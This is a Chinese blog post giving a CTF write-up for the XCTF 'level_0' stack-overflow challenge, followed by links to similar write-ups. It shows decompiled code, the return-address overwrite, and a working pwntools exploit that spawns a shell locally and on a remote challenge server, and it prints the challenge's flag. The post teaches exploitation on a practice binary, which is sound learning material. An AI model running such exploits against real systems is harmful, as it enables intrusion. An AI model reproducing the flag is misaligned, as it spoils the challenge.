level_0 [XCTF-PWN]CTF writeup系列5

最新推荐文章于 2025-04-21 22:15:29 发布
最新推荐文章于 2025-04-21 22:15:29 发布
阅读量703 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: XCTF-PWN CTF 文章标签: xctf ctf pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/fastergohome/article/details/103623743

题目地址:level_0

先看下题目:

照例查看一下保护情况

root@mypwn:/ctf/work/python# checksec df928e471d0849fab9ff0ebe4bfe5ea1 
[*] '/ctf/work/python/df928e471d0849fab9ff0ebe4bfe5ea1'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

反编译下载的程序 ,注意到最重要到三个函数callsystem,vulnerable_function,main

反编译三个函数为c语言代码:

int callsystem()
{
  return system("/bin/sh");
}

ssize_t vulnerable_function()
{
  char buf; // [rsp+0h] [rbp-80h]

  return read(0, &buf, 0x200uLL);
}

int __cdecl main(int argc, const char **argv, const char **envp)
{
  write(1, "Hello, World\n", 0xDuLL);
  return vulnerable_function(1LL, "Hello, World\n");
}

注意到vulnerable_function函数中read函数的第三个参数是0x200,而buf变量分配的空间为80h,这里存在溢出。

在汇编代码中观察system函数调用的开始地址为40059A,传参数+调用system函数

构造payload如下:

payload = 'A'*0x80 + 'A'*8 + p64(0x40059A)

 这里0x80个A赋值给buf,8个A覆盖栈底(注意如果是32位系统就是4个字节),64位的0x40059A覆盖vulnerable_function函数的返回地址,本来返回地址是main函数中调用vulnerable_function函数的下一条指令,这里我们覆盖成我们需要的0x40059A,执行system函数

正常执行程序如下:

root@mypwn:/ctf/work/python# chmod +x df928e471d0849fab9ff0ebe4bfe5ea1
root@mypwn:/ctf/work/python# ./df928e471d0849fab9ff0ebe4bfe5ea1 
Hello, World
aa
root@mypwn:/ctf/work/python#

构造本地执行的python脚本:

#!python
#!/usr/bin/env python
# coding=utf-8

from pwn import *

p = process('./df928e471d0849fab9ff0ebe4bfe5ea1')
# p = remote("111.198.29.45", 41395)

payload = 'A'*0x80 + 'A'*8 + p64(0x40059A)

p.sendlineafter('Hello, World', payload)
p.interactive()

执行结果如下:

root@mypwn:/ctf/work/python# python level_0.py 
[+] Starting local process './df928e471d0849fab9ff0ebe4bfe5ea1': pid 155
[*] Switching to interactive mode

$ id
uid=0(root) gid=0(root) groups=0(root)
$

执行成功,获得来本地shell,接下来修改python脚本,连接服务器的结果如下:

root@mypwn:/ctf/work/python# python level_0.py 
[+] Opening connection to 111.198.29.45 on port 41395: Done
[*] Switching to interactive mode

$ cat flag
cyberpeace{de119d160b209dca8d21fec7e5071b2d}

执行成功,这里我直接执行cat flag,获得flag。

这个题目还是考的栈溢出,在之前覆盖特定变量的基础上,加大了一点难度,需要覆盖到栈底,并突破栈底覆盖返回之后的执行指令地址。

CTF|栈溢出入门题level0解题思路及个人总结
skyattractive的博客
06-01 1322
CTF|栈溢出入门题level0解题思路及个人总结 解题思路 file 查看文件信息:elf、64位、小端序、可执行 拿到题目简单运行一下,发现还是一如既往的简单 拖入64位IDA中反编译 发现vulnerable(指脆弱的、有漏洞的)function 双击打开 func中定义了char型的buf,大小从rbp到rsp共占80个字节 read()函数读入到标准输入设备两百个字节(远大于buf所占空间大小)存在栈溢出 双击buf看它在栈中的位置 发现在0x0之后,可以将system函数写入r所在的位
level0(xctf)
weixin_43868725的博客
05-06 965
0x0 程序保护和流程 保护: 流程: main() vulnerable_function() 很明显的栈溢出,read()允许输入0x200个字符而buf只有0x80 0x1 利用过程 我们在ida的函数窗口处发现了一个callsystem(),可以直接getshell 所以我们只需要将返回地址覆盖成callsystem()的地址就可以拿到flag,buf=0x88*‘a’+p64(0...
UCSC CTF Pwn Writeup (不全o.o)
最新发布
2403_88052992的博客
04-21 433
资源。
xctf--新手练习区--level0
gclome的博客
04-19 713
writeup:拿到这个文件之后先checksec 64位程序,开了NX 然后再运行一下: 会输出Hello,World,然后是输入,我这里输入了aaaaaaaaaaaaaaaaaa 放入IDA里,开始展示的是汇编代码,然后我们F5就可以查看源码,我们先看看main函数里面的: 主函数就是一行打印,一行输入,不过有意思的是,buf的长度是0x80,而read函数允许输入0x200,那我们岂...
pwn入门xctf:level0和[JarvisOj]:level1题解
qq_43627239的博客
07-24 1052
xctfpwnlevel0 这是一个简单的栈溢出题 打开题目下载附件拖到虚拟机中查看它的各种保护机制 发现栈区不可执行 我们用物理机中的IDA看一下 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,跟进去查看发现无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。 接下来查找字符串/bi...
BUUCTF jarvisoj_level0
m0_54262894的博客
10-27 392
先checksec,仅开启了NX保护 运行一下 放入ida中 查看main函数 没有什么关键信息,双击vulnerable_function() 在这里我们看到了漏洞 buf定义了80个字节,而我们可以输入更多的数据 接着找找后门函数 这道题很简单,已经把后门给我们展示出来了 记住后门函数的地址0x400596 做完以上步骤我们就有思路了: 覆盖buf 的80个字节 因为是64位的文件,然后再加8个字节...
get-shell [XCTF-PWN]CTF writeup系列1
重新启程
12-19 2021
因为做vulhub靶场Serial2,在最后一步用到了rop技术,所以就顺便把自己学习pwn的过程做下记录。 今天做的ctf题目是pwn新手训练场的第一题get-shell。 首先我们点击获取在线场景 然后我们就可以看到,这个题目给我们提供了一个服务器端口,我们可以通过telnet连接这个端口 我们可以看到 这个端口是可以直接连接的,这道题目,因为没有回显文件,所以就看不到什么...
string [XCTF-PWN]CTF writeup系列7(超详细分析)
重新启程
12-20 4191
题目地址:string 先看看题目情况 照例检查一下保护机制 root@mypwn:/ctf/work/python# checksec 167e00a26ef44e1f888b3ede29d88e38 [*] '/ctf/work/python/167e00a26ef44e1f888b3ede29d88e38' Arch: amd64-64-little RE...
pwn1 babystack [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列19
重新启程
12-25 1777
题目地址:pwn1 babystack 已经到了高手进阶区的第八题了,已经渐入佳境了。哈哈! 废话不说,看看题目先 厦门邀请赛的题目,还是2星难度,那就开工了。 管理检查一下保护机制: [*] '/ctf/work/python/pwn1/babystack' Arch: amd64-64-little RELRO: Full RELRO Stac...
dice_game [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列12
重新启程
12-23 1915
题目地址:dice_game 从这篇开始就正式进入高手进阶区,一些简单的知识点我这里就不会再重复赘述了,请有需要的同学看前面的章节。 废话不多,看看题目 题目没什么提示,只是知道这个题目的来源是:XCTF 4th-QCTF-2018 下载附件,看看情况,照例做下保护机制检查 root@mypwn:/ctf/work/python/dice_game# checksec dice_g...
warmup [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列14
重新启程
12-23 1940
题目地址:warmup 这是高手进阶区的第三题,我们先看下题目内容 这个题目没有附件,那就是要fuzz的题目了,我们先正常走一下程序看看 root@mypwn:/ctf/work/python/warmup# nc 111.198.29.45 32453 -Warm Up- WOW:0x40060d >AAA 这个题目的出发点就是要大家做fuzz,看下提示内容有个地址0x40060...
[buuctf]jarvisoj_level0
逆向萌新的博客
05-30 577
[buuctf]jarvisoj_level0
buuctf-jarvisoj_level0(pwn)题解
2301_81574836的博客
02-18 428
buuctf-jarvisoj_level0(pwn)题解
BUUCTF pwn——level0
CNS-Enterprise BCC-1701-J
03-12 232
BUUCTF 做题练习
XCTFlevel0[WriteUP]
如有错误感谢斧正
03-16 504
PWN入门题目:XCTF攻防世界的level0
pwn学习-攻防世界新手区
qq_45653588的博客
12-20 1575
文章目录0X00 hello_pwn0X01 when_did_you_born0X02 level00X03 level20x04 CGfsb0x05 guess_num0x06 cgpwn20x07 int_overflow0x08 level30x09 string 0X00 hello_pwn 下载文件,拖入Ubuntu用checksec查看,64位文件,开启了NX保护。 拖入ida查看,read函数读取输入赋值给unk_601068,然后判断dword_60106C是否等于nuaa,相等则执行s
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2693
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界pwn level0做题思路
nzw1134864657的博客
07-24 1919
先看看题目的各种保护机制 栈不可以执行,我们用IDA打开看看 写进一个hello world的字符串,然后执行vulnerable_function()函数 跟进函数里查看 这里我不是特别理解,writeup上是这样写的 “这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址,劫持程序执行流,执行我们想执行的方法。通常我们的目...
xctf攻防世界pwn level0的断点调试
你的小粉丝的博客
07-24 886
level0文件拖入Ubuntu桌面 打开终端:输入cd DESKtop/ gdb level0 开始运行 start 得到如图所示 断点调试 切换到Windows系统,用ida64打开level0 找到main函数的地址,复制 在Ubuntu终端下执行命令:b *0x+刚复制的地址 执行结果如图: 按r运行至断点处 其他命令 ...
pure_color xctf
07-16
### 回答1: pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于网络攻防、密码学、逆向工程等。通过参与这些比赛,参赛者可以提升自己的技能,了解最新的安全威胁和攻击技术,锻炼解决问题的能力。 pure_color xctf的比赛模式多样,可以是个人或团队参与。参赛者需要在限定的时间内完成一系列的题目,这些题目可能包含漏洞分析、编程挑战、数据分析等。比赛过程中,参赛者需要运用各种技术手段,如渗透测试、代码审计、漏洞利用等,解决题目的要求。参赛者不仅需要具备网络安全相关的知识,还需要具备良好的团队合作和解决问题的能力。 此外,pure_color xctf也为参赛者提供了一个交流平台。比赛期间,参赛者可以在平台上与其他选手交流经验、讨论解题思路。参赛者也可以通过竞赛结果来评估自己的能力,并与其他选手进行切磋比拼。 总之,pure_color xctf是一个举办网络安全竞赛的平台,旨在为安全爱好者和专业人士提供学习和交流的机会,促进网络安全技术的发展。 ### 回答2: pure_color xctf 是一项竞技性的网络安全挑战赛。XCCTF 是全球知名的网络安全竞赛组织之一,而 pure_color 是该竞赛组织内的一项赛事。该赛事旨在提升参赛者的网络安全技能和知识,让他们在一个仿真的网络环境中进行攻防对抗。 在 pure_color xctf 中,参赛队伍将根据题目要求进行网络攻击和防御。这些题目有不同的难度级别,并涵盖了各种不同的网络安全技术和攻击类型。参赛队伍将需要利用他们的知识和技能,像真实的黑客一样去攻击系统漏洞,获取目标系统内的敏感信息或是直接控制目标系统。同时,他们也需要通过搭建防御策略和系统来保护自己的系统免受攻击。 pure_color xctf 不仅仅是一个交流学习的平台,也是一个展示能力的舞台。优胜的参赛队伍将会被邀请参加更高级别的网络安全竞赛和会议,进一步提升他们的技能并扩展职业网络。此外,pure_color xctf 也为参赛者提供了一个找到职业机会的平台,很多安全公司和组织会在赛事期间招聘优秀的选手。 总而言之,pure_color xctf 是一个有挑战性的网络安全竞赛,旨在通过攻击和防御对抗提升参赛者的技能,并为他们提供职业发展和展示的机会。同时,这个赛事也在促进网络安全领域的交流和合作,为提升整个网络安全行业的水平做出贡献。 ### 回答3: pure_color xctf 是一个CTF(Capture The Flag,夺旗赛)竞赛平台。CTF是一种网络安全竞赛,旨在让参赛者通过解决一系列的密码学、逆向工程、漏洞利用等问题来获取旗标,比赛者可以通过这些旗标来获取积分并竞争排名。 pure_color xctf 平台是一个为CTF竞赛提供的一个在线环境,类似于一个实验室,用于举办CTF比赛。在这个平台上,参赛者可以注册账号并加入已经发布的CTF赛事中。赛事中的题目被分为不同的难度级别,涵盖了各种安全领域的知识。参赛者需要通过解决题目中的任务来获取旗标,并将其提交到平台上进行验证。在比赛结束后,将根据参赛者解决的题目数量、用时、积分等因素来计算最终排名,并颁发奖励给获胜者。 pure_color xctf 提供了逼真的仿真环境,使得参赛者能够在一个安全的网络环境下进行实时的攻防演练。平台上的题目多样化且具有挑战性,旨在让参赛者将所学的理论知识应用到实际场景中去,并培养解决问题和团队合作的能力。同时,pure_color xctf 还为参赛者提供了交流平台,方便他们在比赛过程中与其他参赛者交流经验、技巧以及解题思路。 总之,pure_color xctf 是一个提供CTF竞赛平台的在线环境,旨在鼓励参赛者在安全领域中深入学习和实践,并通过解决各种挑战赛题目来提升技能和知识水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值